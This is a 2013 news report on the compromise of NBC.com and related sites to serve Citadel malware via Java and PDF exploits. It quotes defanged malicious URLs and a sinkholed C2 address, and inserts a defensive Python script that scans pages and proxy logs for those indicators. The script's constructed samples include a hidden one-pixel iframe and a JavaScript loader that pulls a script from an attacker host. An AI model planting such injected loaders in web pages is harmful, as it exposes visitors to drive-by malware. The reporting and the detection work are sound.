UPDATED 13:57 EST / FEBRUARY 21 2013

NEWS

NBC.com and Associated Sites Hacked and Serving Citadel Malware – UPDATES: Google, Facebook Blocking NBC Links

A Twitter tip (@zrotech) put us on to the breaking news that NBC.com has been hacked and is serving up Citadel malware.

A quick search turned up the following information on the Hitman Pro blog –

A few hours ago Ronald Prins of Fox-IT (@cryptoron) was tweeting about NBC.COM spreading malware. We were investigating this as well and found the following interesting facts.

There were two exploit links on the NBC website. The first one was on the main default (entry) page, and the second one was located on http://www.nbc.com/assets/core/js/s_wrapper.js

It serves both Java (CVE-2013-0422) and PDF exploits. The exploit drops the Citadel Trojan which is used for banking fraud and cyber-espionage. The Citadel malware communicates with the following server, which is already sinkholed:

hxxp://184.82.177.125/tr2002/file.php
hxxp://184.82.177.125/tr2102/file.php

An hour later the attack pages were swapped, which means the cyber criminals still have access to NBC’s pages (my emphasis), linking to e.g.:

hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://nikweinstein.com/cl/google.php
hxxp://walterjeffers.com/ctuk.html
hxxp://barbecuechickenrecipes.org/ctuk.htm
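The write-up quoted above gives two kinds of indicator: hosts that the injected page and script pointed at, and the sinkholed Citadel command-and-control server. The script below is an added example (not code from the Hitman Pro post, NBC, or SiliconANGLE) showing how a defender would turn those indicators into checks: one over a fetched page or script body, looking for `src`/`href`/`url()` references to a known-bad host, and one over a web-proxy log, separating clients that merely loaded a landing page from clients that posted to the C2 and therefore most likely ran the payload. The sample HTML, JavaScript and log lines are constructed for the example, the log format is an assumption of the example, and matching is on host names only because the post says the landing pages were rotated within an hour.

```python
import re
from urllib.parse import urlparse

# Indicators quoted in the Hitman Pro write-up above, kept defanged ("hxxp")
# exactly as published. Only the host part is used for matching, since the
# write-up says the attack pages were swapped within an hour.
DEFANGED_IOCS = [
    "hxxp://184.82.177.125/tr2002/file.php",
    "hxxp://184.82.177.125/tr2102/file.php",
    "hxxp://moi-npovye-sploett.com/qqqq/1.php",
    "hxxp://nikweinstein.com/cl/google.php",
    "hxxp://walterjeffers.com/ctuk.html",
    "hxxp://barbecuechickenrecipes.org/ctuk.htm",
]
C2_HOST = "184.82.177.125"  # the sinkholed Citadel C2 named in the write-up


def refang(url):
    """Turn the defanged 'hxxp' scheme back into one urlparse understands."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


IOC_HOSTS = {urlparse(refang(u)).hostname.lower() for u in DEFANGED_IOCS}

# Any src=/href= (HTML attribute or JS property assignment) or CSS url().
_REF_RE = re.compile(
    r"""(?:src|href)\s*=\s*["']?\s*([^"'\s>]+)|url\(\s*["']?([^"')\s]+)""",
    re.IGNORECASE,
)


def scan_content(text):
    """Return (host, reference) for every reference in a page or script body
    that points at a known-bad host. Relative references (no host) are skipped."""
    hits = []
    for m in _REF_RE.finditer(text):
        ref = m.group(1) or m.group(2)
        host = urlparse(refang(ref)).hostname
        if host and host.lower() in IOC_HOSTS:
            hits.append((host.lower(), ref))
    return hits


def _parse_log_line(line):
    """Assumed (constructed) log format: '<timestamp> <client_ip> <method> <url> <status>'."""
    fields = line.split()
    if len(fields) < 5:
        return None
    return {"ts": fields[0], "client": fields[1], "method": fields[2],
            "url": fields[3], "status": fields[4]}


def scan_log_lines(lines):
    """(client, host, url) for every request to a known-bad host, in log order."""
    hits = []
    for line in lines:
        rec = _parse_log_line(line)
        if rec is None:
            continue
        host = urlparse(rec["url"]).hostname
        if host and host.lower() in IOC_HOSTS:
            hits.append((rec["client"], host.lower(), rec["url"]))
    return hits


def c2_clients(lines):
    """Clients that reached the Citadel C2 itself. A landing-page hit only
    proves exposure; traffic to the C2 means the dropped Trojan is running."""
    return {client for client, host, _ in scan_log_lines(lines) if host == C2_HOST}


# Constructed samples modelled on the write-up (not NBC's real content): a
# one-pixel iframe in the entry page and a loader appended to the wrapper script.
SAMPLE_HTML = """<html><body>
<script src="/assets/core/js/s_wrapper.js"></script>
<iframe src='http://walterjeffers.com/ctuk.html' width=1 height=1></iframe>
</body></html>"""

SAMPLE_JS = """(function(){var s=document.createElement('script');
s.src="http://nikweinstein.com/cl/google.php";document.body.appendChild(s);})();"""

# Constructed proxy log in the format assumed by _parse_log_line.
SAMPLE_PROXY_LOG = [
    "2013-02-21T13:05:01Z 10.1.2.34 GET http://www.nbc.com/ 200",
    "2013-02-21T13:05:02Z 10.1.2.34 GET http://www.nbc.com/assets/core/js/s_wrapper.js 200",
    "2013-02-21T13:05:03Z 10.1.2.34 GET http://walterjeffers.com/ctuk.html 200",
    "2013-02-21T13:05:09Z 10.1.2.34 POST http://184.82.177.125/tr2002/file.php 200",
    "2013-02-21T13:06:00Z 10.1.2.57 GET http://www.nbc.com/ 200",
]

if __name__ == "__main__":
    for name, body in (("entry page", SAMPLE_HTML), ("s_wrapper.js", SAMPLE_JS)):
        for host, ref in scan_content(body):
            print(f"{name}: references {host} via {ref}")
    for client, host, url in scan_log_lines(SAMPLE_PROXY_LOG):
        print(f"{client} -> {host} ({url})")
    print("clients that beaconed to C2:", sorted(c2_clients(SAMPLE_PROXY_LOG)))
```

Because the landing-page hosts were already being rotated while the write-up was published, the host list above goes stale quickly and a real deployment would feed it from a current indicator source; the connection to the sinkholed C2 is the more durable signal, which is why `c2_clients` is split out from the exposure list.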


Banking fraud and cyber-espionage are major threats in the world of malware. With all the recent news of Twitter, Facebook and Apple being hacked, it is notable that a compromise of this scale has surfaced in the wake of those stories. There have been accusations that a Chinese military-sponsored effort is behind the largest and most sophisticated cyber-attacks against the United States. We’ll update with details as they become available. In the meantime, avoid visiting NBC.com if you can. Since the exploit chain targets CVE-2013-0422, which Oracle patched in Java 7 Update 11 in January, disabling the Java browser plug-in or confirming it is up to date removes the Java side of the risk; the PDF exploit still depends on an unpatched reader.

Update – The same source reports that Facebook is blocking links to NBC.com

UPDATE 2 –
Reports are coming in that the compromise affects not only NBC’s own subsites but also related sites such as JayLenosGarage and Late Night with Jimmy Fallon. Google is also reportedly blacklisting all NBC sites, though I have tested this and have not seen it yet.

Last Update – There are reports that the malware is no longer active and has been removed from the sites. We’ll post a wrap-up of everything we can find out (what happened, how you can protect yourself, and more) as soon as possible.

